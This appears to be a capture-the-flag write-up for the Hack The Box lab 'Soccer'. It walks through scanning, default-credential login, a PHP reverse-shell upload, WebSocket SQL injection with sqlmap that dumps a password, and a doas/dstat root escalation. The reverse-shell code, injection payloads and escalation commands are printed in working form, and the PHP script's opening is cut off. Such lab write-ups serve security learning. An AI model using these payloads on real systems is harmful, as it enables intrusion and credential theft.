Error

# Soccer ## Nmap scan ``` $ nmap -sC -sV -Pn -oN nmap 10.10.11.194 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 16:38 +08 Nmap scan report for 10.10.11.194 Host is up (0.0065s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA) | 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA) |_ 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://soccer.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) 9091/tcp open xmltec-xmlmail? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: | HTTP/1.1 400 Bad Request | Connection: close | GetRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src 'none' | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 139 | Date: Thu, 23 May 2024 08:38:30 GMT | Connection: close | | | | | Error | | |

Cannot GET /

Cannot OPTIONS /

| |_ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9091-TCP:V=7.94SVN%I=7%D=5/23%Time=664F0081%P=x86_64-pc-linux-gnu%r SF:(informix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20clos SF:e\r\n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection SF::\x20close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found SF:\r\nContent-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type SF:-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\ SF:nContent-Length:\x20139\r\nDate:\x20Thu,\x2023\x20May\x202024\x2008:38: SF:30\x20GMT\r\nConnection:\x20close\r\n\r\n\n\n\n\nError\ SF:n\n\n

Cannot\x20GET\x20/

\n\n\n")%r SF:(HTTPOptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security- SF:Policy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\ SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201 SF:43\r\nDate:\x20Thu,\x2023\x20May\x202024\x2008:38:30\x20GMT\r\nConnecti SF:on:\x20close\r\n\r\n\n\n\n SF:\nError\n\n\nCannot\x20OPTIONS\x20/\n\n\n")%r(RTSPRequest,16C, SF:"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20defaul SF:t-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\ SF:x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Th SF:u,\x2023\x20May\x202024\x2008:38:30\x20GMT\r\nConnection:\x20close\r\n\ SF:r\n\n\n\n\nError\n\n\n

Cannot\x20OPTIO
SF:NS\x20/

\n\n\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20 SF:Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP SF:,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n SF:")%r(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConn SF:ection:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Reques SF:t\r\nConnection:\x20close\r\n\r\n")%r(SSLSessionReq,2F,"HTTP/1\.1\x2040 SF:0\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.14 seconds ``` ## Initial Access ### Port 80 There is a website running on port 80.

After looking at the source code, there is nothing really stands out. However after enumerating more, there is a directory that stands out. ``` $ feroxbuster -u http://soccer.htb -x js,html,php,txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.3 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://soccer.htb 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.3 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [js, html, php, txt] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 494l 1440w 96128c http://soccer.htb/ground3.jpg 200 GET 2232l 4070w 223875c http://soccer.htb/ground4.jpg 200 GET 147l 526w 6917c http://soccer.htb/index.html 200 GET 809l 5093w 490253c http://soccer.htb/ground1.jpg 200 GET 711l 4253w 403502c http://soccer.htb/ground2.jpg 200 GET 147l 526w 6917c http://soccer.htb/ 301 GET 7l 12w 178c http://soccer.htb/tiny => http://soccer.htb/tiny/ 301 GET 7l 12w 178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/ [####################] - 41s 450105/450105 0s found:8 errors:0 [####################] - 25s 150000/150000 5979/s http://soccer.htb/ [####################] - 31s 150000/150000 4813/s http://soccer.htb/tiny/ [####################] - 31s 150000/150000 4812/s http://soccer.htb/tiny/uploads/ ``` After going to `http://soccer.htb/tiny`, it brings us to this page.

When we look at the source code we can also see the version that this is running on which is `2.4.3`.

## Running reverse shell to get www-data We are able to login as `admin` using the default credentials.

After signing in, we can see that we can upload our own payload.

This will be the payload we will be using to get back a reverse shell from the target. ``` array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ``` The only place that we can upload is `/var/www/html/tiny/uploads`.

After that, we can just go that page to trigger the reverse shell.

After running `linpeas.sh`, we can see that there is a subdomain in the nginx config

After visiting that webpage, we can see that the website is able to login and signup.

After signing in, we are greeted with this page.

If we try our ticket ID, it will return `Ticket Exists`.

If we try a random ticket number or random charaacters, it will return us `Ticket Doesn't Exist`.

However, if we add random numbers but with the SQLi payload, it will return as `Ticket Exists`.

However, it does not trigger an request when click enter on our keyboard. Upon inspecting the source code, we can see that they are using WebSockets to send the message ```html ``` If we look at BurpSuite, we can see it under `WebSockets history`. We can also see how the data is being sent over.

From there we can use sqlmap to automated the process. ``` $ sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id":"4444 or 1=1"}' -dbs ___ __H__ ___ ___[']_____ ___ ___ {1.8.2#stable} |_ -| . ['] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:18:31 /2024-05-24/ JSON data found in POST body. Do you want to process it? [Y/n/q] y [11:18:33] [INFO] resuming back-end DBMS 'mysql' [11:18:33] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: JSON id ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: {"id":"4444 or 1=1 AND 6922=6922"} Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: {"id":"4444 or 1=1 AND (SELECT 2438 FROM (SELECT(SLEEP(5)))vAzG)"} --- [11:18:36] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [11:18:36] [INFO] fetching database names [11:18:36] [INFO] fetching number of databases [11:18:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:18:36] [INFO] retrieved: 5 [11:18:36] [INFO] retrieved: mysql [11:18:37] [INFO] retrieved: information_schema [11:18:40] [INFO] retrieved: performance_schema [11:18:43] [INFO] retrieved: sys [11:18:44] [INFO] retrieved: soccer_db available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] soccer_db [*] sys ``` We can see that there are 5 different database but we are more interested in `soccer_db` database. From there we can just automated the process again. ``` $ sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id":"4444 or 1=1"}' -D soccer_db --tables ___ __H__ ___ ___[(]_____ ___ ___ {1.8.2#stable} |_ -| . [.] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:19:32 /2024-05-24/ JSON data found in POST body. Do you want to process it? [Y/n/q] Y [11:19:34] [INFO] resuming back-end DBMS 'mysql' [11:19:34] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: JSON id ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: {"id":"4444 or 1=1 AND 6922=6922"} Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: {"id":"4444 or 1=1 AND (SELECT 2438 FROM (SELECT(SLEEP(5)))vAzG)"} --- [11:19:37] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [11:19:37] [INFO] fetching tables for database: 'soccer_db' [11:19:37] [INFO] fetching number of tables for database 'soccer_db' [11:19:37] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:19:37] [INFO] retrieved: 1 [11:19:37] [INFO] retrieved: accounts Database: soccer_db [1 table] +----------+ | accounts | +----------+ [11:19:38] [INFO] fetched data logged to text files under '/home/ranay/.local/share/sqlmap/output/soc-player.soccer.htb' [*] ending @ 11:19:38 /2024-05-24/ ``` We will notice that there is only 1 table which is `accounts`. We will then dump out the content of this table to see what is inside. ``` $ sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id":"4444 or 1=1"}' -D soccer_db -T accounts --dump ___ __H__ ___ ___[']_____ ___ ___ {1.8.2#stable} |_ -| . [.] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:20:41 /2024-05-24/ JSON data found in POST body. Do you want to process it? [Y/n/q] Y [11:20:43] [INFO] resuming back-end DBMS 'mysql' [11:20:43] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: JSON id ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: {"id":"4444 or 1=1 AND 6922=6922"} Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: {"id":"4444 or 1=1 AND (SELECT 2438 FROM (SELECT(SLEEP(5)))vAzG)"} --- [11:20:46] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [11:20:46] [INFO] fetching columns for table 'accounts' in database 'soccer_db' [11:20:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:20:46] [INFO] retrieved: 4 [11:20:46] [INFO] retrieved: email [11:20:47] [INFO] retrieved: id [11:20:47] [INFO] retrieved: password [11:20:49] [INFO] retrieved: username [11:20:50] [INFO] fetching entries for table 'accounts' in database 'soccer_db' [11:20:50] [INFO] fetching number of entries for table 'accounts' in database 'soccer_db' [11:20:50] [INFO] retrieved: 1 [11:20:50] [INFO] retrieved: player@player.htb [11:20:55] [INFO] retrieved: 1324 [11:20:56] [INFO] retrieved: PlayerOftheMatch2022 [11:20:59] [INFO] retrieved: player Database: soccer_db Table: accounts [1 entry] +------+-------------------+----------------------+----------+ | id | email | password | username | +------+-------------------+----------------------+----------+ | 1324 | player@player.htb | PlayerOftheMatch2022 | player | +------+-------------------+----------------------+----------+ [11:21:00] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/ranay/.local/share/sqlmap/output/soc-player.soccer.htb/dump/soccer_db/accounts.csv' [11:21:00] [INFO] fetched data logged to text files under '/home/ranay/.local/share/sqlmap/output/soc-player.soccer.htb' [*] ending @ 11:21:00 /2024-05-24/ ``` From here, we can get the password (`PlayerOftheMatch2022`) for the user `player`.

## Privilege Escalation ### doas Privilege Escalation We will first find if there is a `doas.conf` ``` find / -type f -name "doas.conf" 2>/dev/null /usr/local/etc/doas.conf ``` Next, we will see what is the command that we are able to use using `doas` command. We will see that we can use `dstat` command. ``` cat /usr/local/etc/doas.conf permit nopass player as root cmd /usr/bin/dstat ``` If we search online, we can see that there is a privilege escalation vulnerability using `sudo` which works the same way as `doas` since the user to doas is root. {% embed url="" %} After following the steps, we are able to get back the root shell and from there get the flag. ``` $ echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_xxx.py $ doas -u root /usr/bin/dstat --xxx /usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses import imp # whoami root ```